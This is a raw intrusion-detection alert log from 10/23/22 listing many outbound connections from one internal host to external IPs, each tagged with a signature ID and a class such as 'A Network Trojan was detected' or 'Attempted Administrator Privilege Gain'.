            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.219.3.10539618802027121 10/23/22-17:57:02.473923
            SID:2027121
            Source Port:39618
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.10.214.21851998802846457 10/23/22-17:57:00.275551
            SID:2846457
            Source Port:51998
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.196.17.5256560802027121 10/23/22-17:57:52.205788
            SID:2027121
            Source Port:56560
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.135.39.21053162802027121 10/23/22-17:57:54.816950
            SID:2027121
            Source Port:53162
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.34.111.12838796802027121 10/23/22-17:56:58.091705
            SID:2027121
            Source Port:38796
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2389.161.145.19943544802846457 10/23/22-17:57:55.917898
            SID:2846457
            Source Port:43544
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.156.252.24948290802027121 10/23/22-17:56:55.703449
            SID:2027121
            Source Port:48290
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23156.255.164.18741856802841623 10/23/22-17:57:28.948733
            SID:2841623
            Source Port:41856
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.78.3.16059672802846380 10/23/22-17:56:39.216972
            SID:2846380
            Source Port:59672
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23197.27.108.8940834802835222 10/23/22-17:57:40.421683
            SID:2835222
            Source Port:40834
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2389.189.198.4758450802846457 10/23/22-17:57:43.770300
            SID:2846457
            Source Port:58450
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.100.78.21333312802027121 10/23/22-17:57:45.076992
            SID:2027121
            Source Port:33312
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.126.102.936288802027121 10/23/22-17:57:10.567170
            SID:2027121
            Source Port:36288
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.58.114.6134364802846380 10/23/22-17:58:22.758351
            SID:2846380
            Source Port:34364
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.188.204.24160806802846380 10/23/22-17:57:37.868952
            SID:2846380
            Source Port:60806
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2384.184.229.16852704802846457 10/23/22-17:57:56.399410
            SID:2846457
            Source Port:52704
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.214.72.20360748802846457 10/23/22-17:57:18.317427
            SID:2846457
            Source Port:60748
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2383.85.134.20941880802846380 10/23/22-17:58:06.271924
            SID:2846380
            Source Port:41880
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.118.202.13657850802846457 10/23/22-17:57:00.301592
            SID:2846457
            Source Port:57850
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.208.46.2448630802027121 10/23/22-17:57:38.601501
            SID:2027121
            Source Port:48630
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.186.243.14137720802027121 10/23/22-17:58:29.874545
            SID:2027121
            Source Port:37720
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2346.232.89.21346668802846457 10/23/22-17:58:15.499399
            SID:2846457
            Source Port:46668
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.7.232.4360146802846457 10/23/22-17:58:21.669709
            SID:2846457
            Source Port:60146
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2361.241.102.12847924802846457 10/23/22-17:57:02.878954
            SID:2846457
            Source Port:47924
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.161.208.8033030802846457 10/23/22-17:58:10.293377
            SID:2846457
            Source Port:33030
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.198.81.11145392802027121 10/23/22-17:58:34.994957
            SID:2027121
            Source Port:45392
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.99.185.18048222802027121 10/23/22-17:58:29.896573
            SID:2027121
            Source Port:48222
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.216.98.23840924802027121 10/23/22-17:56:53.412111
            SID:2027121
            Source Port:40924
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.123.238.545042802846380 10/23/22-17:57:30.754544
            SID:2846380
            Source Port:45042
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.39.174.19560302802846457 10/23/22-17:56:55.096205
            SID:2846457
            Source Port:60302
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23171.238.159.19444648802846457 10/23/22-17:56:55.131893
            SID:2846457
            Source Port:44648
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.105.184.24936070802027121 10/23/22-17:57:25.752184
            SID:2027121
            Source Port:36070
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2318.203.114.12335412802841623 10/23/22-17:56:48.003722
            SID:2841623
            Source Port:35412
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.208.215.13537378802027121 10/23/22-17:56:51.056799
            SID:2027121
            Source Port:37378
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.99.172.10056870802027121 10/23/22-17:57:21.048748
            SID:2027121
            Source Port:56870
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.220.42.21041296802027121 10/23/22-17:58:21.910265
            SID:2027121
            Source Port:41296
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23122.9.140.21357004802846457 10/23/22-17:57:14.271185
            SID:2846457
            Source Port:57004
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.223.100.17842044802846380 10/23/22-17:57:46.332141
            SID:2846380
            Source Port:42044
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.235.250.21135562802846457 10/23/22-17:56:55.184860
            SID:2846457
            Source Port:35562
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2393.176.161.555027675472023548 10/23/22-17:58:32.220679
            SID:2023548
            Source Port:50276
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.97.228.2050406802027121 10/23/22-17:57:57.698014
            SID:2027121
            Source Port:50406
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.232.20.225.5953198802846457 10/23/22-17:57:07.070140
            SID:2846457
            Source Port:53198
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.166.205.3445960802846457 10/23/22-17:58:20.257070
            SID:2846457
            Source Port:45960
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.121.125.18157090802846457 10/23/22-17:57:00.289486
            SID:2846457
            Source Port:57090
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.229.208.19857412802841623 10/23/22-17:57:12.574073
            SID:2841623
            Source Port:57412
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23181.56.189.19453136802846380 10/23/22-17:58:01.079461
            SID:2846380
            Source Port:53136
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.180.164.14853386802846380 10/23/22-17:58:06.256755
            SID:2846380
            Source Port:53386
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2318.132.14.16834498802841623 10/23/22-17:58:28.070323
            SID:2841623
            Source Port:34498
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2393.124.81.2135899675472835222 10/23/22-17:58:21.369314
            SID:2835222
            Source Port:58996
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.232.19.246.6937664802846457 10/23/22-17:57:03.277028
            SID:2846457
            Source Port:37664
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.179.188.18048038802027121 10/23/22-17:58:24.017151
            SID:2027121
            Source Port:48038
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2382.66.59.9058862802846380 10/23/22-17:57:07.268963
            SID:2846380
            Source Port:58862
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.121.152.17648986802027121 10/23/22-17:57:28.421617
            SID:2027121
            Source Port:48986
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2346.255.80.11041464802846457 10/23/22-17:58:15.382045
            SID:2846457
            Source Port:41464
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.143.19.4234100802846380 10/23/22-17:56:49.782645
            SID:2846380
            Source Port:34100
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.26.189.21859532802846380 10/23/22-17:58:09.192519
            SID:2846380
            Source Port:59532
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2323.27.89.18441918802841623 10/23/22-17:57:20.664517
            SID:2841623
            Source Port:41918
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.99.26.3041148802027121 10/23/22-17:57:52.289831
            SID:2027121
            Source Port:41148
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23154.92.86.21054124802841623 10/23/22-17:57:44.711261
            SID:2841623
            Source Port:54124
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.129.16.3059434802027121 10/23/22-17:58:02.095359
            SID:2027121
            Source Port:59434
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2382.64.71.13854430802846380 10/23/22-17:58:06.167062
            SID:2846380
            Source Port:54430
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.17.137.4747052802846457 10/23/22-17:57:07.090557
            SID:2846457
            Source Port:47052
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.221.7.22439098802027121 10/23/22-17:57:54.655484
            SID:2027121
            Source Port:39098
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2389.47.197.2750758802846457 10/23/22-17:58:07.981171
            SID:2846457
            Source Port:50758
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.217.188.22041578802027121 10/23/22-17:57:33.447053
            SID:2027121
            Source Port:41578
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.101.242.17936518802027121 10/23/22-17:57:16.265202
            SID:2027121
            Source Port:36518
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.209.237.10058060802027121 10/23/22-17:57:40.651414
            SID:2027121
            Source Port:58060
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.204.30.11433854802027121 10/23/22-17:57:54.944174
            SID:2027121
            Source Port:33854
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.85.225.24345690802846380 10/23/22-17:57:54.138966
            SID:2846380
            Source Port:45690
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.216.173.16454520802027121 10/23/22-17:57:43.887723
            SID:2027121
            Source Port:54520
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2380.92.18.23346846802846457 10/23/22-17:56:52.759797
            SID:2846457
            Source Port:46846
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.213.212.12255564802027121 10/23/22-17:56:53.181960
            SID:2027121
            Source Port:55564
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.214.139.14451614802846457 10/23/22-17:57:16.979802
            SID:2846457
            Source Port:51614
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.82.113.4935862802846380 10/23/22-17:58:36.921850
            SID:2846380
            Source Port:35862
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.214.152.13042676802846457 10/23/22-17:57:16.980121
            SID:2846457
            Source Port:42676
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.22.222.25435020802846457 10/23/22-17:58:23.947115
            SID:2846457
            Source Port:35020
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.65.176.17357190802846380 10/23/22-17:58:06.158919
            SID:2846380
            Source Port:57190
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2385.182.250.4443018802846457 10/23/22-17:58:17.675581
            SID:2846457
            Source Port:43018
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.160.59.6155138802027121 10/23/22-17:57:31.280934
            SID:2027121
            Source Port:55138
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23184.30.226.16533914802841623 10/23/22-17:58:35.989286
            SID:2841623
            Source Port:33914
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2361.123.26.10852008802846457 10/23/22-17:57:03.031309
            SID:2846457
            Source Port:52008
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.217.203.16246600802027121 10/23/22-17:57:10.416403
            SID:2027121
            Source Port:46600
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.167.23.1255730802027121 10/23/22-17:57:31.353965
            SID:2027121
            Source Port:55730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.164.44.5054342802846457 10/23/22-17:58:17.724388
            SID:2846457
            Source Port:54342
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.239.253.5942700802846380 10/23/22-17:57:37.863396
            SID:2846380
            Source Port:42700
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.101.218.24846982802027121 10/23/22-17:57:45.110477
            SID:2027121
            Source Port:46982
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.84.196.9649294802027121 10/23/22-17:58:21.906560
            SID:2027121
            Source Port:49294
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23206.109.178.14536532802846380 10/23/22-17:57:18.686267
            SID:2846380
            Source Port:36532
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.239.171.20749492802846380 10/23/22-17:58:13.489666
            SID:2846380
            Source Port:49492
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2337.187.222.7035378802846457 10/23/22-17:57:31.531264
            SID:2846457
            Source Port:35378
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.80.93.16857048802027121 10/23/22-17:57:23.588409
            SID:2027121
            Source Port:57048
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23122.114.11.17535594802846457 10/23/22-17:58:34.721796
            SID:2846457
            Source Port:35594
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2382.219.198.2643082802846380 10/23/22-17:56:39.308865
            SID:2846380
            Source Port:43082
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.143.190.3455920802027121 10/23/22-17:57:13.055323
            SID:2027121
            Source Port:55920
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.215.157.14548604802027121 10/23/22-17:57:52.063667
            SID:2027121
            Source Port:48604
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23112.74.229.25358570802027121 10/23/22-17:57:05.100364
            SID:2027121
            Source Port:58570
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.165.238.6535306802846380 10/23/22-17:57:58.462353
            SID:2846380
            Source Port:35306
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23164.138.220.3650862802846457 10/23/22-17:58:34.386628
            SID:2846457
            Source Port:50862
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2318.185.14.12156320802835221 10/23/22-17:56:59.044847
            SID:2835221
            Source Port:56320
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23195.52.223.8741530802846457 10/23/22-17:56:43.200335
            SID:2846457
            Source Port:41530
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.90.158.12535632802027121 10/23/22-17:56:53.300379
            SID:2027121
            Source Port:35632
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2385.187.250.18139796802846457 10/23/22-17:57:41.232614
            SID:2846457
            Source Port:39796
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23120.92.21.7239306802835222 10/23/22-17:57:41.496216
            SID:2835222
            Source Port:39306
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2384.23.57.1943080802846457 10/23/22-17:58:32.966323
            SID:2846457
            Source Port:43080
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23213.154.237.17937630802846380 10/23/22-17:58:33.198325
            SID:2846380
            Source Port:37630
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.234.248.2642208802846457 10/23/22-17:57:00.290264
            SID:2846457
            Source Port:42208
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23188.12.80.16456698802846457 10/23/22-17:57:47.843208
            SID:2846457
            Source Port:56698
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.189.125.23639944802846380 10/23/22-17:57:29.327768
            SID:2846380
            Source Port:39944
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2380.237.252.8960790802846380 10/23/22-17:57:43.250723
            SID:2846380
            Source Port:60790
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.230.44.258844802027121 10/23/22-17:58:17.333711
            SID:2027121
            Source Port:58844
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.151.99.19552616802027121 10/23/22-17:58:09.667670
            SID:2027121
            Source Port:52616
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2382.180.174.21033622802846380 10/23/22-17:57:55.380078
            SID:2846380
            Source Port:33622
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23206.237.244.17037386802846380 10/23/22-17:58:39.795290
            SID:2846380
            Source Port:37386
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2345.195.66.8047360600012835222 10/23/22-17:58:16.590535
            SID:2835222
            Source Port:47360
            Destination Port:60001
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23213.33.159.8649974802846380 10/23/22-17:56:58.220523
            SID:2846380
            Source Port:49974
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2383.136.68.7054668802846380 10/23/22-17:58:27.227485
            SID:2846380
            Source Port:54668
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.154.87.14959382802027121 10/23/22-17:58:13.003572
            SID:2027121
            Source Port:59382
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23211.230.198.2345602475472835222 10/23/22-17:58:21.207012
            SID:2835222
            Source Port:56024
            Destination Port:7547
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.101.95.5336712802027121 10/23/22-17:58:07.322514
            SID:2027121
            Source Port:36712
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23169.60.241.2756906802846380 10/23/22-17:57:51.921872
            SID:2846380
            Source Port:56906
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2388.215.75.18958826802027121 10/23/22-17:57:52.297848
            SID:2027121
            Source Port:58826
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.220.219.560466802027121 10/23/22-17:56:53.331054
            SID:2027121
            Source Port:60466
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.148.49.13946250802027121 10/23/22-17:56:55.700368
            SID:2027121
            Source Port:46250
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23164.90.174.9746544802846457 10/23/22-17:58:34.368239
            SID:2846457
            Source Port:46544
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.101.48.3759692802027121 10/23/22-17:58:39.900557
            SID:2027121
            Source Port:59692
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23206.54.174.7355984802846380 10/23/22-17:57:56.384128
            SID:2846380
            Source Port:55984
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.161.176.11846056802846457 10/23/22-17:58:07.888196
            SID:2846457
            Source Port:46056
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23122.228.200.11355490528692027339 10/23/22-17:57:13.843759
            SID:2027339
            Source Port:55490
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.175.123.8452272802027121 10/23/22-17:57:21.047423
            SID:2027121
            Source Port:52272
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.239.73.2643444802846380 10/23/22-17:57:27.953857
            SID:2846380
            Source Port:43444
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23112.16.232.5048798802027121 10/23/22-17:57:07.672992
            SID:2027121
            Source Port:48798
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.56.88.15132876802027121 10/23/22-17:57:10.508381
            SID:2027121
            Source Port:32876
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2337.61.176.21852240802846457 10/23/22-17:57:07.225214
            SID:2846457
            Source Port:52240
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2389.252.128.19853072802846457 10/23/22-17:57:41.195924
            SID:2846457
            Source Port:53072
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2323.247.23.14953492802835222 10/23/22-17:58:09.588805
            SID:2835222
            Source Port:53492
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23200.143.59.9050554802846380 10/23/22-17:58:22.268112
            SID:2846380
            Source Port:50554
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23156.234.151.23938852802835221 10/23/22-17:58:29.254030
            SID:2835221
            Source Port:38852
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.167.133.6146242802027121 10/23/22-17:57:07.985971
            SID:2027121
            Source Port:46242
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2388.99.163.16738284802027121 10/23/22-17:56:55.636157
            SID:2027121
            Source Port:38284
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.2395.79.100.12842722802027121 10/23/22-17:57:10.399522
            SID:2027121
            Source Port:42722
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.232.19.40.24756212802846457 10/23/22-17:57:20.936290
            SID:2846457
            Source Port:56212
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2384.19.116.20152724802846457 10/23/22-17:58:32.924272
            SID:2846457
            Source Port:52724
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.235.9.254.20146138802846457 10/23/22-17:57:35.597658
            SID:2846457
            Source Port:46138
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.233.150.21146914802027121 10/23/22-17:58:15.336128
            SID:2027121
            Source Port:46914
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23122.226.189.7956512528692027339 10/23/22-17:58:20.081753
            SID:2027339
            Source Port:56512
            Destination Port:52869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23178.73.253.21847716802846380 10/23/22-17:58:27.264197
            SID:2846380
            Source Port:47716
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.232.23.137.18941384802846457 10/23/22-17:57:28.774429
            SID:2846457
            Source Port:41384
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2395.169.220.5645852802027121 10/23/22-17:58:21.906116
            SID:2027121
            Source Port:45852
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.23171.236.63.23657642802846457 10/23/22-17:58:39.917870
            SID:2846457
            Source Port:57642
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23200.234.188.12334796802846380 10/23/22-17:57:13.939438
            SID:2846380
            Source Port:34796
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.23178.217.249.15446152802846380 10/23/22-17:57:28.012879
            SID:2846380
            Source Port:46152
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2346.228.150.8633954802846457 10/23/22-17:58:15.342921
            SID:2846457
            Source Port:33954
            Destination Port:80
            Protocol:TCP
            Classtype:Attempted Administrator Privilege Gain
            Timestamp:192.168.2.2383.59.120.5057516802846380 10/23/22-17:58:19.929373
            SID:2846380
            Source Port:57516
            Destination Port:80
            Protocol:TCP
